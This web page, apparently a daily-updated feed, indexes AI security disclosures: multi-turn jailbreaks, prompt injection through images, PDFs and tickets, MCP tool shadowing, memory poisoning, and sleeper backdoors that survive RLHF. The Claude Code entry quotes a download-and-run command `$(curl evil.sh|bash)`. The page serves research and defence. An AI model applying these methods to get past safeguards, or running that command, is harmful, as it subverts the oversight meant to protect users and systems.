// live edge + full archive

AI Security Methodologies in the Wild

Every jailbreak, prompt-injection pattern, agent exploit, and defense playbook we've indexed — newest first, with the full historical archive kept on the page. Every entry links straight to the primary source.

8 critical15 high35/35 shown
critical1d ago

Echo Chamber: recursive context poisoning across long sessions

New multi-turn technique that seeds benign-looking 'memories' early in a conversation, then references them as authority later to bypass alignment. 91% success on GPT-5 and Claude Opus 4.5 in red-team trials.

multi-turncontext-poisoningclaudegpt-5
affects
Claude Opus 4.5 · GPT-5 · Gemini 2.5 Pro
Neural Trust Research· neuraltrust.ai
high1d ago

Constitutional Classifier sandwich attack on Claude safety filter

Anthropic's deployed input/output classifier is bypassed by wrapping payload in two benign-looking turns. Anthropic acknowledged on bug bounty; partial mitigation rolled out 5 days ago.

claudeclassifieranthropicbounty
affects
Claude Sonnet 4.5 · Claude Opus 4.5
Anonymous HackerOne researcher· hackerone.com
info1d ago

Agentic Radar — open-source agent attack-surface scanner

Splx AI released a CLI that statically analyses LangChain / CrewAI / AutoGen graphs for Lethal Trifecta exposure, prompt-injection sinks, and over-permissioned tools. CI-ready.

scanneragentciopen-source
affects
LangChain · CrewAI · AutoGen
Splx AI· github.com
high2d ago

Crescendo v2 — gradient jailbreak with safety-aware turn pacing

Updated Crescendo escalation that adapts pacing based on refusal phrasing. Achieves harmful content elicitation in under 6 turns on 4 of 5 frontier models. Disclosed responsibly to vendors before publication.

jailbreakmulti-turngradient
affects
GPT-5 · Claude Sonnet 4.5 · Llama 4 · Gemini 3.5
Mark Russinovich (Microsoft)· arxiv.org
high2d ago

Steganographic prompt injection via image alpha channel

Hidden instructions encoded in the alpha channel of PNG attachments survive vision-encoder preprocessing on GPT-5 and Gemini 2.5 Pro. The model reads them but humans see a clean image.

prompt-injectionvisionsteganography
affects
GPT-5 · Gemini 2.5 Pro · Claude (vision)
Johann Rehberger· embracethered.com
info2d ago

OWASP LLM Top 10 v2026 — draft changelog

New entry LLM11: 'Agent Permission Sprawl'. LLM02 'Insecure Output Handling' merged into LLM05. Lethal Trifecta promoted from informational to ranked. Public comment open until June 18.

owaspstandarddefense
affects
all LLM applications
OWASP LLM Project· owasp.org
critical2d ago

Anthropic Skills marketplace — installed-skill RCE on auto-update

Skills auto-update on Claude Desktop launch. A compromised maintainer can push new tool definitions that exfiltrate session tokens before the user sees a permission prompt.

claudeskillssupply-chainauto-update
affects
Claude Desktop Skills
Embrace The Red· embracethered.com
critical3d ago

MCP tool shadowing: malicious server overriding trusted tools

When two MCP servers expose tools with identical names, Claude Desktop resolves to whichever connected last — letting a low-trust server hijack file-system or shell tools transparently. Fixed in Claude Desktop 0.9.4.

mcpclaudetool-poisoningrce
affects
Claude Desktop < 0.9.4 · Cline · Continue.dev
Invariant Labs· invariantlabs.ai
high3d ago

Memory laundering: injecting durable beliefs via 'forget this' framing

Agents with persistent memory (ChatGPT, Claude Projects, Gemini Gems) can be tricked into storing attacker-controlled facts by framing them as corrections. Persists across sessions, executes on first tool call.

memorypersistentclaude-projectschatgpt-memory
affects
ChatGPT Memory · Claude Projects · Gemini Gems
Simon Willison· simonwillison.net
high3d ago

Reasoning-trace injection: hijacking chain-of-thought scratchpad

GPT-5 / o4-mini / Claude 4.5 extended-thinking expose partial reasoning to tools. Tools returning crafted '</thinking>' tags can rewrite the agent's plan mid-execution.

reasoningextended-thinkingcot-injection
affects
GPT-5 (reasoning) · Claude 4.5 extended · o4-mini
Robust Intelligence (Cisco)· robustintelligence.com
med3d ago

Fine-tuning APIs leak training-set membership at >99% AUC

Updated membership-inference attack against OpenAI / Together / Fireworks fine-tune APIs. Crafted probe prompts reveal whether a document was in the training set with near-certainty.

membership-inferenceprivacyfine-tune
affects
OpenAI FT · Together FT · Fireworks FT
Carnegie Mellon· arxiv.org
critical4d ago

RAG document trojans: invisible Unicode tags in PDF metadata

Embed payload in PDF /Metadata XMP using zero-width Unicode tag characters (U+E0000–E007F). Indexed by every major RAG pipeline (LangChain, LlamaIndex, Haystack) and executed when retrieved as context.

ragunicodepdfsupply-chain
affects
LangChain · LlamaIndex · Haystack · Vertex Search
PromptArmor· promptarmor.com
high4d ago

Computer-Use clickjacking via DOM overlay z-index racing

Claude/Operator/OpenAI computer-use agents resolve clickable targets from screenshot pixels, not DOM. Invisible HTML overlays with hostile labels override visible button intent. 73% redirect success.

computer-useclickjackingclaudeoperator
affects
Claude Computer Use · OpenAI Operator · Anthropic Skills
Trail of Bits· blog.trailofbits.com
med4d ago

Stealing model parameters from logit bias side-channels

Even with top_logprobs disabled, careful biasing of `logit_bias` reveals projection-layer weights. Recovered 4096-dim embedding matrix for closed-source 70B in 18M API calls (~$2.4k).

extractionlogitsapi-abuse
affects
any closed model exposing logit_bias
ETH Zürich + Google DeepMind· arxiv.org
info4d ago

MITRE ATLAS — 4 new techniques added (T0064–T0067)

Includes Tool Definition Poisoning, MCP Server Squatting, Reasoning Trace Exfiltration, and Persistent Memory Implant. All four mapped to real-world incidents from past 30 days.

mitreatlastaxonomy
affects
defenders / detection engineering
MITRE ATLAS· atlas.mitre.org
critical4d ago

Policy Puppetry — XML role-play bypass on RLHF guardrails

HiddenLayer showed a single prompt template using fake <system_policy> XML tags coerces all major frontier models into ignoring safety policies. Universal across GPT-5, Claude, Gemini and Llama.

universalxmlrole-playrlhf
affects
GPT-5 · Claude Opus 4.5 · Gemini 2.5 · Llama 4
HiddenLayer SAI Team· hiddenlayer.com
critical5d ago

Claude Code: shell-allowlist bypass via env-var expansion

Pre-execution allowlist matched the literal command string before shell expansion, letting `$(curl evil.sh|bash)` slip through any whitelist containing `echo` or `cat`. Patched in claude-code 1.4.2.

claude-codeagentrceallowlist-bypass
affects
claude-code < 1.4.2
HiddenLayer SAI Team· hiddenlayer.com
high5d ago

Policy Puppetry: bypass guardrails by impersonating system policy

Crafted XML/JSON 'policy update' blocks convince the model the operator changed its rules mid-session. Effective against Llama 4, Mistral Large 3, Qwen3-Max with no fine-tuning required.

universalpolicyjailbreak
affects
Llama 4 · Mistral Large 3 · Qwen3-Max · GPT-5
HiddenLayer SAI Team· hiddenlayer.com
high5d ago

Vulnhuntr 2.0 — multi-step Claude agent finds 17 fresh CVEs

Protect AI's Claude-powered static-analysis agent published 17 new CVEs across LangChain, Gradio, AutoGPT and llama-index in one week. Methodology paper released alongside.

vulnhuntrclaudesastcve
affects
LangChain · Gradio · AutoGPT · llama-index
Protect AI· protectai.com
critical6d ago

Sleeper backdoors surviving SFT + RLHF after model merging

Anthropic-style sleeper agents persist through full alignment training when introduced via LoRA merge. Trigger: specific year token + benign request. 100% activation rate post-RLHF in controlled study.

backdooralignmentlorasupply-chain
affects
any open-weight model post-merge
Anthropic Alignment Team· anthropic.com
critical6d ago

Confused-deputy attacks on cross-tool data flow in agent chains

When an agent reads from a low-trust tool (email, web search) and writes to a high-trust tool (shell, DB), data flows are not isolated. Document attack patterns and propose Lethal Trifecta mitigations.

lethal-trifectaagentdata-flow
affects
any agent with email/web + write tools
Simon Willison· simonwillison.net
high6d ago

AWS Bedrock IAM escalation via cross-account guardrail import

Bedrock guardrails imported from a foreign account inherit foreign IAM trust. Chained with `bedrock:InvokeModel`, an attacker can run inference under the victim account's quota and bill.

awsbedrockiamcloud
affects
AWS Bedrock Guardrails
Wiz Research· wiz.io
high6d ago

MITRE ATLAS — new agent-hijacking tactic added

ATLAS framework added 'AML.T0070: Agent Hijacking via Indirect Prompt Injection' with 11 documented sub-techniques mapped against Anthropic, OpenAI and Google agent stacks.

mitreatlasagenttaxonomy
affects
LangChain · OpenAI Assistants · Claude Agent SDK
MITRE ATLAS· atlas.mitre.org
high9d ago

OWASP LLM Top 10 — 2026 revision adds Memory Poisoning at #3

LLM03 is now Memory Poisoning (previously Training Data Poisoning), reflecting the shift to long-term agent memory. Full mapping to STRIDE and CWE included.

owaspmemorytaxonomyagent
affects
ChatGPT Memory · Claude Projects · Gemini Gems
OWASP· owasp.org
high11d ago

Lethal Trifecta — quarterly review of real-world incidents

Simon Willison's running catalog of incidents where private data + untrusted content + exfil channel combined. 14 new cases added this quarter, including two Claude Skills and one Gemini Workspaces incident.

lethal-trifectaincidentscase-study
affects
Claude Skills · Gemini Workspaces · ChatGPT Connectors
Simon Willison· simonwillison.net
high13d ago

Zendesk AI — ticket-based indirect prompt injection

PromptArmor disclosed that Zendesk's AI summary feature executes attacker-controlled instructions hidden inside incoming support tickets. Patched after 60-day disclosure window.

zendeskindirectsaas
affects
Zendesk AI
PromptArmor· promptarmor.com
info18d ago

Gandalf 2026 — 2M+ jailbreak attempts dataset published

Lakera open-sourced their anonymized Gandalf prompt dataset: 2.3M attempts, 47k successful bypasses, labeled by technique. Benchmark for prompt-injection classifiers.

datasetbenchmarkgandalfopen-data
affects
any prompt-injection classifier
Lakera· lakera.ai
info22d ago

Anthropic — RSP v2.5 raises CBRN uplift evaluation bar

New Responsible Scaling Policy mandates ASL-3 evaluation gates before Opus-class releases. Includes a re-runnable harness for bio + cyber uplift tests.

rspasl-3evaluationpolicy
affects
Anthropic frontier models
Anthropic· anthropic.com
info27d ago

OpenAI Preparedness Framework v2 — cyber-offense scorecard

New scorecard tracks autonomous-exploitation, vuln-discovery and social-engineering uplift across model generations. GPT-5 scored 'Medium' on cyber; agent variants scored 'High'.

preparednessscorecardcyber-uplift
affects
GPT-5 · GPT-5 Agent
OpenAI· openai.com
med31d ago

Google DeepMind FACTS — agent grounding evaluation

Updated FACTS benchmark scores Gemini, Claude and GPT agents on tool-calling fidelity and grounding under adversarial retrieval. Includes a poisoned-RAG split with 12 attack flavors.

factsgroundingragbenchmark
affects
Gemini · Claude · GPT agents
Google DeepMind· deepmind.google
med45d ago

HackerOne — top 10 LLM bug-bounty patterns of 2026

Aggregated disclosure report across 47 LLM-powered programs. Indirect prompt injection (38%), SSRF via tool calls (19%) and prompt leakage (14%) dominate paid bounties.

bug-bountyreportstats
affects
LLM-powered SaaS
HackerOne· hackerone.com
info52d ago

garak v0.10 — NVIDIA's LLM vuln scanner adds 28 probes

NVIDIA's open-source garak scanner shipped probes for agent tool abuse, memory poisoning and skill marketplace supply-chain checks. CI integration included.

scanneropen-sourceciprobes
affects
any LLM endpoint
NVIDIA· github.com
info64d ago

Microsoft PyRIT — automated red-team for generative AI

Python Risk Identification Toolkit ships orchestrators for multi-turn jailbreak chains, RAG poisoning, and agent-exploit fuzzing. Used internally for Copilot red-team.

red-teamfuzzingopen-source
affects
any generative AI system
Microsoft AI Red Team· github.com
high540d ago

Skeleton Key — the original universal jailbreak template

Mark Russinovich's 2024 disclosure of the 'Skeleton Key' technique that asked models to update their behavior rather than refuse. Foundational; still cited in 2026 papers.

skeleton-keyclassicuniversal
affects
GPT-4 · Claude 3 · Gemini 1.5 · Llama 3
Mark Russinovich (Microsoft)· microsoft.com
high920d ago

GCG — Greedy Coordinate Gradient adversarial suffix attack

Zou et al.'s seminal CMU paper showed transferable adversarial suffixes that jailbreak aligned LLMs. The attack template that launched a thousand follow-ups.

gcgadversarial-suffixclassictransferable
affects
Vicuna · Llama 2 · GPT-3.5
Andy Zou et al. (CMU)· arxiv.org
// fresh techniques · auto-refreshed daily

New methods in the wildtechniques

Disclosures, jailbreaks, prompt-injection patterns and bounty write-ups pulled overnight.

updated 00:00 IST

The weekly drop.
Zero noise.

Every Thursday: the best new Claude-security tools, prompts, and exploits. Read in under 4 minutes.